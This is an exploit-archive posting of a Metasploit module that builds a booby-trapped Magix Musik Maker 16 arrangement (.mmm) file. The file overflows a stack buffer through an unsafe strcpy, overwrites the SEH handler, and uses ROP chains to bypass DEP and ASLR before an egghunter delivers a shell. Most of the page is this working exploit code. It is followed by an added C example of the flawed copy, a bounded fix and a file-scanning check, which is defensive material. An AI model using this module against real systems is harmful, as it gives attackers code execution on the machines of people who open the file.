Magix Musik Maker 16 .mmm Stack Buffer Overflow
Posted May 23, 2011
Authored by corelanc0d3r, Acidgen | Site metasploit.com

This Metasploit module exploits a stack buffer overflow in Magix Musik Maker 16. When opening a specially crafted arrangement file (.mmm) in the application, an unsafe strcpy() will allow you to overwrite a SEH handler. This exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7. Egghunter is used, and might require up to several seconds to receive a shell.

tags | exploit, overflow, shell
systems | windows, 7
advisories | OSVDB-72455
MD5 | 570e91a977ec5caabe84bd083c0b5756

##
# $Id: magix_musikmaker_16_mmm.rb 12688 2011-05-22 23:41:15Z swtornio $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::Egghunter

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Magix Musik Maker 16 .mmm Stack Buffer Overflow',
      'Description'    => %q{
        This module exploits a stack buffer overflow in Magix Musik Maker 16.
        When opening a specially crafted arrangement file (.mmm) in the application, an
        unsafe strcpy() will allow you to overwrite a SEH handler. This exploit
        bypasses DEP & ASLR, and works on XP, Vista & Windows 7. Egghunter is used, and
        might require up to several seconds to receive a shell.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'acidgen',      # found the vulnerability
          'corelanc0d3r'  # rop exploit + msf module
        ],
      'Version'        => '$Revision: 12688 $',
      'References'     =>
        [
          [ 'OSVDB', '72455' ],
          [ 'URL', 'http://www.corelan.be/advisories.php?id=CORELAN-11-002' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'Space'       => 8000, # could be more, but this is enough
          'DisableNops' => 'True',
          'BadChars'    => "\x00\x0a\x0d",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [
            'Windows Universal DEP & ASLR Bypass',
            {
              'OffSet' => 198,
              'Ret'    => 0x200146fa, # add esp,40c/ret [ltkrn14n.dll]
            }
          ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Apr 26 2011',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ true, 'mmm file', 'msf.mmm']),
      ], self.class)
  end

  # Random 32-bit value for the stack slots that the gadgets below pop and discard.
  def junk
    return rand_text(4).unpack("L")[0].to_i
  end

  def exploit
    print_status("Creating '#{datastore['FILENAME']}' file ...")

    badchars = ""
    eggoptions =
      {
        :checksum  => false,
        :eggtag    => "Wo0t",
        :depmethod => "copy",
        :depreg    => "edi",
        :depdest   => "ebp"
      }
    hunter,egg = generate_egghunter(payload.encoded,badchars,eggoptions)

    # Minimal .mmm (RIFF) arrangement header, reproduced byte for byte
    header = "RIFF"
    header << "\x8c"
    header << "A"
    header << "\x07\x00"
    header << "SEKDSVIP"
    header << "\x10\x07\x00\x00\x9b"
    header << "[n"
    header << "\x00" * 5
    header << "\x11"
    header << "\x00" * 3
    header << "\x08"
    header << "\x00" * 3
    header << "D"
    header << "\xac\x00\x00\x11"
    header << "\x00" * 9
    header << "9@"
    header << "\x00\x00\xf0"
    header << "B"
    header << "\x00" * 4
    header << "\xbd\x04\xef\xfe\x00\x00\x01"
    header << "\x00" * 3
    header << "\x10\x00\x04\x00\x02"
    header << "\x00" * 3
    header << "\x10\x00\x04\x00\x02\x00"
    header << "?"
    header << "\x00" * 3
    header << "("
    header << "\x00" * 3
    header << "\x04\x00\x04\x00\x01"
    header << "\x00" * 15
    header << "K"
    header << "\x91"
    header << "2"
    header << "\x01\xd0\x02\x00\x00"
    header << "@"
    header << "\x02\x00\x00"
    header << "UUUUUU"
    header << "\xf5"
    header << "?"
    header << "\x10"
    header << "\x00" * 7
    header << "\xff" * 8
    header << "\x00" * 1680
    header << "LISTx"
    header << "\x95\x02\x00"
    header << "physfile"
    header << "\xf8\x08\x00\x00"
    header << "C:\\Documents and Settings\\"
    header << rand_text(8)
    header << "\\My Documents\\MAGIX_Music_Maker_16\\AudioTemp"
    header << "\x00" * 52
    header << "Fat Rocker I_ogg.HDP"
    header << "\x00" * 110
    header << "C:\\Documents and Settings\\All Users\\Application Data\\MAGIX\\Music_Maker_16\\_Demos\\Demo"
    header << "\x00" * 175
    header << "Fat Rocker I.OGG"
    header << "\x00" * 678
    header << "\xf0\xbf"
    header << "\x00" * 22
    header << "\xf0"
    header << "?"
    header << "\x00" * 6
    header << "^@"
    header << "\x00" * 6
    header << "^@"
    header << "\x00" * 264

    # The path field that is copied with strcpy(); everything after it overflows the stack buffer
    filename = "C:\\temp\\"
    filename << "\xb3\x10\xf8\x1f" * 14 # slide
    filename << "\x1e\x92\x01\x20" # align

    rop_chain1 =
      [
        # API pointer
        0x2004e493, # PUSH ESP # ADD EAX,20 # POP EBX # RETN ** [LTKRN14N.dll]
        0x1ff810b3, # rop nop
        0x1ff810b3, # rop nop
        0x1ff810b3, # rop nop
        0x20047f30, # POP ECX # RETN ** [LTKRN14N.dll]
        0x2005012c, # &API ptr
        0x200263e4, # MOV EAX,DWORD PTR DS:[ECX] # RETN ** [LTKRN14N.dll]
        0x1ffa3ab3, # MOV DWORD PTR DS:[EBX],EAX # MOV EAX,1 # POP EBX # RETN 0C ** [LTDIS14n.dll]
        junk,
        0x2004e493, # PUSH ESP # ADD EAX,20 # POP EBX # RETN ** [LTKRN14N.dll]
        junk,
        junk,
        junk,
        0x20035546, # MOV EAX,EBX # POP EBP # POP EBX # RETN ** [LTKRN14N.dll]
        junk,
        junk,
        0x1ff95f45, # PUSH EAX # POP ESI # RETN 08 ** [LTDIS14n.dll]
        0x1ffa82ef, # POP EAX # RETN
        junk,
        junk,
        0x2E9FA63D,
        0x2004cb15, # ADD EAX,74085539 # ADD EAX,5D58046A # RETN ** [LTKRN14N.dll] D16059A3
        0x1ff93af7, # ADD EAX,ESI # POP ESI # RETN ** [LTDIS14n.dll]
        junk,
        0x20047f30, # POP ECX # RETN ** [LTKRN14N.dll]
        0x2001283a, # POP ESI # POP EBP # POP EBX # ADD ESP,1F4 # RETN 10 ** [LTKRN14N.dll]
        # write
        0x1ff9cf5a, # MOV DWORD PTR DS:[EAX],ECX # MOV EAX,1 # POP ESI # RETN 08 ** [LTDIS14n.dll]
        junk,
        0x2004e493, # PUSH ESP # ADD EAX,20 # POP EBX # RETN ** [LTKRN14N.dll]
        junk,
        junk,
        0x20035546, # MOV EAX,EBX # POP EBP # POP EBX # RETN ** [LTKRN14N.dll]
        junk,
        junk,
        0x1ff95f45, # PUSH EAX # POP ESI # RETN 08 ** [LTDIS14n.dll]
        0x1ffa82ef, # POP EAX # RETN
        junk,
        junk,
        0x2E9FA5F9,
        0x2004cb15, # ADD EAX,74085539 # ADD EAX,5D58046A # RETN ** [LTKRN14N.dll]
        0x1ff93af7, # ADD EAX,ESI # POP ESI # RETN ** [LTDIS14n.dll]
        junk,
        0x2003e6cd, # MOV DWORD PTR DS:[EAX],EDI # POP EDI # POP ESI # MOV EAX,1 # RETN 10 ** [LTKRN14N.dll]
        junk,
        junk,
        0x1ffa82ef, # POP EAX # RETN ** [LTDIS14n.dll]
        junk,
      ].pack("V*")

    rop_chain2 = [
        0x2004cb15, # ADD EAX,74085539 # ADD EAX,5D58046A # RETN ** [LTKRN14N.dll]
        0x1ff7c4e5, # XCHG EAX,EDI # RETN ** [LTDIS14n.dll]
        0x2004e493, # PUSH ESP # ADD EAX,20 # POP EBX # RETN ** [LTKRN14N.dll]
        0x20035546, # MOV EAX,EBX # POP EBP # POP EBX # RETN ** [LTKRN14N.dll]
        junk,
        junk,
        0x1ff95f45, # PUSH EAX # POP ESI # RETN 08 ** [LTDIS14n.dll]
        0x1ffa82ef, # POP EAX # RETN
        junk,
        junk,
        0x2E9FA591,
        0x2004cb15, # ADD EAX,74085539 # ADD EAX,5D58046A # RETN ** [LTKRN14N.dll] D16059A3
        0x1ff93af7, # ADD EAX,ESI # POP ESI # RETN ** [LTDIS14n.dll]
        junk,
        0x2003e6cd, # MOV DWORD PTR DS:[EAX],EDI # POP EDI # POP ESI # MOV EAX,1 # RETN 10 ** [LTKRN14N.dll]
        junk,
        junk,
        0x1ffa82ef, # POP EAX # RETN ** [LTDIS14n.dll]
        junk,
        junk,
        junk,
        junk,
        0x2E9FB65D,
        0x2004cb15, # ADD EAX,74085539 # ADD EAX,5D58046A # RETN ** [LTKRN14N.dll]
        0x1ff7c4e5, # XCHG EAX,EDI # RETN ** [LTDIS14n.dll]
        0x2004e493, # PUSH ESP # ADD EAX,20 # POP EBX # RETN ** [LTKRN14N.dll]
        0x20035546, # MOV EAX,EBX # POP EBP # POP EBX # RETN ** [LTKRN14N.dll]
        junk,
        junk,
        0x1ff95f45, # PUSH EAX # POP ESI # RETN 08 ** [LTDIS14n.dll]
        0x1ffa82ef, # POP EAX # RETN
        junk,
        junk,
        0x2E9FA539,
        0x2004cb15, # ADD EAX,74085539 # ADD EAX,5D58046A # RETN ** D16059A3 [LTKRN14N.dll]
        0x1ff93af7, # ADD EAX,ESI # POP ESI # RETN ** [LTDIS14n.dll]
        junk,
        0x2003e6cd, # MOV DWORD PTR DS:[EAX],EDI # POP EDI # POP ESI # MOV EAX,1 # RETN 10 ** [LTKRN14N.dll]
        junk,
        junk,
        0x2004e494, # ADD EAX,20 # POP EBX # RETN ** [LTKRN14N.dll]
        junk,
        junk,
        junk,
        junk,
        junk,
        0x2004e494, # ADD EAX,20 # POP EBX # RETN ** [LTKRN14N.dll]
        junk,
        0x1ffa0231, # DEC EAX # RETN ** [LTDIS14n.dll]
        0x1ff7c4e5, # XCHG EAX,EDI # RETN ** [LTDIS14n.dll]
        0x2004e493, # PUSH ESP # ADD EAX,20 # POP EBX # RETN ** [LTKRN14N.dll]
        0x20035546, # MOV EAX,EBX # POP EBP # POP EBX # RETN ** [LTKRN14N.dll]
        junk,
        junk,
        0x1ff95f45, # PUSH EAX # POP ESI # RETN 08 ** [LTDIS14n.dll]
        0x1ffa82ef, # POP EAX # RETN
        junk,
        junk,
        0x2E9FA4D9,
        0x2004cb15, # ADD EAX,74085539 # ADD EAX,5D58046A # RETN ** [LTKRN14N.dll] D16059A3
        0x1ff93af7, # ADD EAX,ESI # POP ESI # RETN ** [LTDIS14n.dll]
        junk,
        0x2003e6cd, # MOV DWORD PTR DS:[EAX],EDI # POP EDI # POP ESI # MOV EAX,1 # RETN 10 ** [LTKRN14N.dll]
        junk,
        junk,
        0x2004e493, # PUSH ESP # ADD EAX,20 # POP EBX # RETN ** [LTKRN14N.dll]
        junk,
        junk,
        junk,
        junk,
        0x20035546, # MOV EAX,EBX # POP EBP # POP EBX # RETN ** [LTKRN14N.dll]
        junk,
        junk,
        0x1ff95f45, # PUSH EAX # POP ESI # RETN 08 ** [LTDIS14n.dll]
        0x1ffa82ef, # POP EAX # RETN
        junk,
        junk,
        0x2E9FA469,
        0x2004cb15, # ADD EAX,74085539 # ADD EAX,5D58046A # RETN ** [LTKRN14N.dll]
        0x1ff93af7, # ADD EAX,ESI # POP ESI # RETN ** [LTDIS14n.dll]
        junk,
        0x1ff72ce1, # XCHG EAX,ESP # POP EDI # POP ESI # POP EBP # POP EBX # MOV EAX,1 # RETN
        junk,
      ].pack("V*")

    rop_chain3 = [
        0x1ff95f45, # PUSH EAX # POP ESI # RETN 08
        junk,
        junk,
        junk,
        junk,
        0x1ffa82ef, # POP EAX # RETN
        junk,
        junk,
        0x2004FF98,
        0x1ffaccf6, # ADD EAX,100 # POP EBP # RETN
        junk,
        0x20026406, # MOV EAX,DWORD PTR DS:[EAX] # NEG EAX # RETN ** [LTKRN14N.dll]
        0x20026408, # NEG EAX # RETN ** [LTKRN14N.dll]
        0x1ff7c4e5, # XCHG EAX,EDI # RETN ** [LTDIS14n.dll]
        0x2004da79, # XOR EAX,EAX # RETN ** [LTKRN14N.dll]
        0x1ff93ae1, # ADD EAX,ESI # POP ESI # RETN
        junk,
        0x1ff95f45, # PUSH EAX # POP ESI # RETN 08 ** [LTDIS14n.dll]
        0x1fffeb75, # XCHG EAX,EBP # RETN ** [LTKRN14N.dll]
        junk,
        junk,
        # Oh Irony !
        0x6001ac84, # PUSHAD # RETN ** [ijl10.dll]
      ].pack("V*")

    # Pad out to the SEH record: OffSet counts from the end of the path field
    rop_chain1_filler = rand_text(target['OffSet'] - rop_chain1.length - 2 )

    # find a close heap
    prehunter = "\x33\xC0" # xor eax,eax
    prehunter << "\x64\x8B\x40\x30" # mov eax,fs[:30]
    prehunter << "\x83\xC0\x48" # add eax,48
    prehunter << "\x83\xC0\x48" # add eax,48
    prehunter << "\x8B\x10" # mov edx,[eax]
    prehunter << "\x83\xc2\x4c" # add edx,4c
    prehunter << "\x83\xc2\x4c" # add edx,4c
    prehunter << "\x8B\x12" # mov edx,[edx]

    nops = make_nops(100)

    filler = "\x5D\xC6\x9F\x2E" # offset to 0x2000
    filler << "\xc2\x53\x02\x20" # RETN
    filler << "\x04\x80\xfa\x1f" # jump - first run : 0x1ffa8004 : {pivot 8} # POP EDI # POP EBP # RETN ** [LTDIS14n.dll]
    filler << "\x12\x3a\xff\x1f" # p/p/p/p/add esp,90/ret [ltkrn14n.dll] - second run
    filler << "\xff\xff\xff\xff" # access violation

    # Note: buffer is the same String object as header, so the appends below grow
    # header as well, and the header + buffer concatenation at the end writes the
    # assembled buffer twice. Kept as published.
    buffer = header
    buffer << filename
    buffer << rop_chain1
    buffer << rop_chain1_filler
    buffer << [target.ret].pack("V")
    buffer << filler
    buffer << rop_chain2
    buffer << rop_chain3
    buffer << prehunter
    buffer << hunter
    buffer << nops
    buffer << egg

    filecontent = header + buffer

    print_status("Writing payload to file")

    file_create(filecontent)

  end

end
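The root cause named in the description and exercised by the module's `filename` field is an unbounded strcpy() of a file-supplied path into a fixed stack buffer. The following C program is an added example, not code from the Metasploit module or from MAGIX: it shows that vulnerable pattern beside a bounded replacement, and a small triage check a defender can run over an .mmm file to flag a "physfile" path that no MAX_PATH-sized buffer could hold. The chunk layout it assumes (the tag "physfile", a 4-byte little-endian size, then NUL-terminated paths) is taken from the header the module builds; the 260-byte buffer size, the function names and the sample files are assumptions made for illustration.

```c
/* Added example, not part of the Metasploit module or of MAGIX's code.
 * Assumed: a MAX_PATH-sized stack buffer, and the "physfile" chunk layout
 * seen in the module's header (tag, 4-byte LE size, NUL-terminated paths). */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PATH_BUF 260            /* assumed MAX_PATH-sized stack buffer */
#define PHYSFILE_TAG "physfile"

/* Vulnerable pattern: nothing bounds the copy, so a field of PATH_BUF bytes
 * or more overruns 'path' and the frame above it (on 32-bit Windows that
 * includes the SEH record). Shown only to make the defect concrete. */
static size_t load_path_unsafe(const char *field)
{
    char path[PATH_BUF];
    strcpy(path, field);                    /* no length check */
    return strlen(path);
}

/* Hardened form: the terminator search is bounded by the chunk, the length is
 * checked against the destination, and the result is always NUL-terminated.
 * Returns 0 on success, -1 on any size violation. */
static int load_path_safe(const uint8_t *field, size_t field_len,
                          char *out, size_t out_len)
{
    const uint8_t *nul = memchr(field, '\0', field_len);
    if (nul == NULL)
        return -1;                          /* unterminated inside the chunk */
    size_t n = (size_t)(nul - field);
    if (n >= out_len)
        return -1;                          /* would not fit with its NUL */
    memcpy(out, field, n);
    out[n] = '\0';
    return 0;
}

/* Triage: find the "physfile" chunk and measure its first path string.
 * Returns that length, or -1 if the chunk is missing or the string runs past
 * the declared chunk / end of file. */
static long physfile_path_len(const uint8_t *data, size_t len)
{
    const size_t taglen = strlen(PHYSFILE_TAG);
    for (size_t i = 0; i + taglen + 4 <= len; i++) {
        if (memcmp(data + i, PHYSFILE_TAG, taglen) != 0)
            continue;
        const uint8_t *p = data + i + taglen;
        uint32_t chunk = (uint32_t)p[0] | (uint32_t)p[1] << 8 |
                         (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
        const uint8_t *body = p + 4;
        size_t avail = len - (size_t)(body - data);
        if (chunk < avail)
            avail = chunk;                  /* never read past the chunk */
        const uint8_t *nul = memchr(body, '\0', avail);
        return nul ? (long)(nul - body) : -1;
    }
    return -1;
}

/* 1 = path too long for a PATH_BUF buffer, 0 = within bounds, -1 = no chunk */
static int mmm_is_suspicious(const uint8_t *data, size_t len)
{
    long n = physfile_path_len(data, len);
    if (n < 0)
        return -1;
    return n >= PATH_BUF ? 1 : 0;
}

/* Constructed sample: RIFF lead-in, "physfile" chunk, path of path_len bytes. */
static size_t build_sample(uint8_t *out, size_t out_len, size_t path_len)
{
    static const char lead[] = "RIFF\x10\x00\x00\x00LISTphysfile";
    const size_t leadlen = sizeof lead - 1;
    const size_t body = path_len + 1 + 16;  /* path, NUL, some padding */
    if (leadlen + 4 + body > out_len)
        return 0;
    memcpy(out, lead, leadlen);
    uint8_t *p = out + leadlen;
    *p++ = (uint8_t)body;        *p++ = (uint8_t)(body >> 8);
    *p++ = (uint8_t)(body >> 16); *p++ = (uint8_t)(body >> 24);
    memset(p, 'A', path_len);
    memcpy(p, "C:\\", path_len < 3 ? path_len : 3);
    p[path_len] = '\0';
    memset(p + path_len + 1, 0, 16);
    return leadlen + 4 + body;
}

/* Helpers returning plain ints so results can be checked, not just printed. */
static int demo(size_t path_len)
{
    uint8_t buf[1024];
    size_t n = build_sample(buf, sizeof buf, path_len);
    return n ? mmm_is_suspicious(buf, n) : -1;
}

static int safe_copy_result(size_t path_len, int terminated)
{
    uint8_t field[512];
    char out[PATH_BUF];
    size_t field_len = path_len + (terminated ? 1 : 0);
    if (field_len > sizeof field)
        return -2;
    memset(field, 'A', path_len);
    if (terminated)
        field[path_len] = '\0';
    return load_path_safe(field, field_len, out, sizeof out);
}

static int unsafe_demo(void)
{
    return (int)load_path_unsafe("C:\\temp\\msf.mmm"); /* short input: 15 */
}

int main(void)
{
    printf("benign sample suspicious=%d, oversized sample suspicious=%d\n",
           demo(40), demo(300));
    printf("bounded copy of 40 bytes: %d, of 300 bytes: %d, unsafe len: %d\n",
           safe_copy_result(40, 1), safe_copy_result(300, 1), unsafe_demo());
    return 0;
}
```

The check keys on length alone because that is what the overflow needs: the module's path field is over 260 bytes before the SEH record is even reached. Real .mmm files may carry several path strings per chunk, so a production scanner would walk every NUL-terminated run in the chunk rather than only the first.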